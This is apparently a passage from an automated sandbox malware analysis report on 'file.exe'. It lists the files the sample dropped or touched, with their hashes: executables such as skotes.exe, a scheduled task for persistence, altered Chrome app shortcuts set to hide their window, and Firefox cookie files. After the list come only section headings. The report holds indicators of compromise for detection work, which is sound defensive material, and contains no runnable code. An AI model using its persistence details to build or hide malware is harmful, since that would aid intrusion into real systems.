C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Temp\1012962001\931e3b56d4.exe	PE32 executable (GUI) Intel 80386, for MS Windows	04C18CB01E6A3734CE103ECDCC287EFA	555DC38073CB01B75CF53C43D8A546FB54D37AF8	FDAF97CDA146F6B4617421FE07DF788633205BEDC55260EFFE7C73128AA9D104
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EA30F894FE762202951845239534C957	AFCCC92D4CB80FD6CCE247EBC4CD4F2AC19B3FF1	E5028661C1FF34315D05DF120DA582B969DEDD2C61478AE31673F266921E795E
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Dec 7 13:06:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	53316FB5A88FBA3D11AAE9EB43C0A9BE	DC301E94C98D253C22DD3B9A4B7EE1B4F917B98A	C094604CB1037C057B7A9243040D5DA3C886AF9B5A04A1319DAFCB09E57C0099
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Dec 7 13:06:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	C115CC348EEF53B2B9E532E9A1B421AE	3AAE24E472816A75046FC7211B9069E48E8856D0	222CC114185B27CC85D5704EA74FF06BFF022B006479FD27878B6528FFE1E918
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	065D80073E55015662EA35BCC00E6CA9	85DE9ED7D443AFFB10531F58C5F08B6250D50328	C87D79EA3D2957857D0159F9946CBE6A08D41F397B5894E83658B21D33A9841B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Dec 7 13:06:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	8F17E404A5D8CF2309CEA68AC6085B26	CD2543755154337F1DEBCC37DE8EA60F3C155EDC	50F159CA3D9683C67B928DEE24E29E800EBE49798576B348251AF0A32B13662B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Dec 7 13:06:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	5899FD93F7E1BF5964867D40D55ABF4D	3B113746ECB657E8FF3C77F13FADC04730A84262	1CDA9EF9CA376DD47F5BB371FF0745460E87CE8A400219B33D2E139521457A1F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Dec 7 13:06:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	4E00164A2C1905C1A6BB6AEEAE02EAE2	78178342D7501F754ECCBD96636205D5989FB60B	8AD5D8AE6750B2809A8D404B169568FB26A81744E1CCDD1A898E1F74796985E2
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\Documents\JDGIECGIEB.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EA30F894FE762202951845239534C957	AFCCC92D4CB80FD6CCE247EBC4CD4F2AC19B3FF1	E5028661C1FF34315D05DF120DA582B969DEDD2C61478AE31673F266921E795E
C:\Windows\Tasks\skotes.job	data	B6767B1FCC1BC13DC04041D29C74742C	E020459296AD62B46206CAB039CEA354E80A2B9C	CB3AE960DDEA1CDA29C0BD707619E2409C66F9096CFAE22E44E435AD38B87C27
Chrome Cache Entry: 103	ASCII text, with very long lines (2412)	E51B78D04BF7FEADF2B7281088079FD5	47E0DCBBC95DA92A2B5E973C33200C3DD82E18A6	7E8CC44AC8BED91DC83AF132CA1F374227C3A634F9020FFC66720C74A8DBAA53
Chrome Cache Entry: 104	ASCII text, with very long lines (8561)	BB27D6B11267C7ACCA5DC1CEF9F9C338	B21988390F0EB63C0A73C8A87BF70516BD5E0539	52DE35187F6464B36B3CC47E2FDBBE966EEEBE9DE630D5349E3162F6A93948B4
Chrome Cache Entry: 105	ASCII text	6FED308183D5DFC421602548615204AF	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
Chrome Cache Entry: 106	ASCII text, with very long lines (65531)	728B743999A514FBD4BC6CBBEB27B3C6	01B0F29AC4DA6E06AF103DE0B2E7F1CFD6C96125	A5526897EA4E7998AC378DB87045141D9917416E65C5FB3DCC73808B5E4A9515
Chrome Cache Entry: 107	ASCII text, with very long lines (5162), with no line terminators	7977D5A9F0D7D67DE08DECF635B4B519	4A66E5FC1143241897F407CEB5C08C36767726C1	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
Chrome Cache Entry: 108	SVG Scalable Vector Graphics image	554640F465EB3ED903B543DAE0A1BCAC	E0E6E2C8939008217EB76A3B3282CA75F3DC401A	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by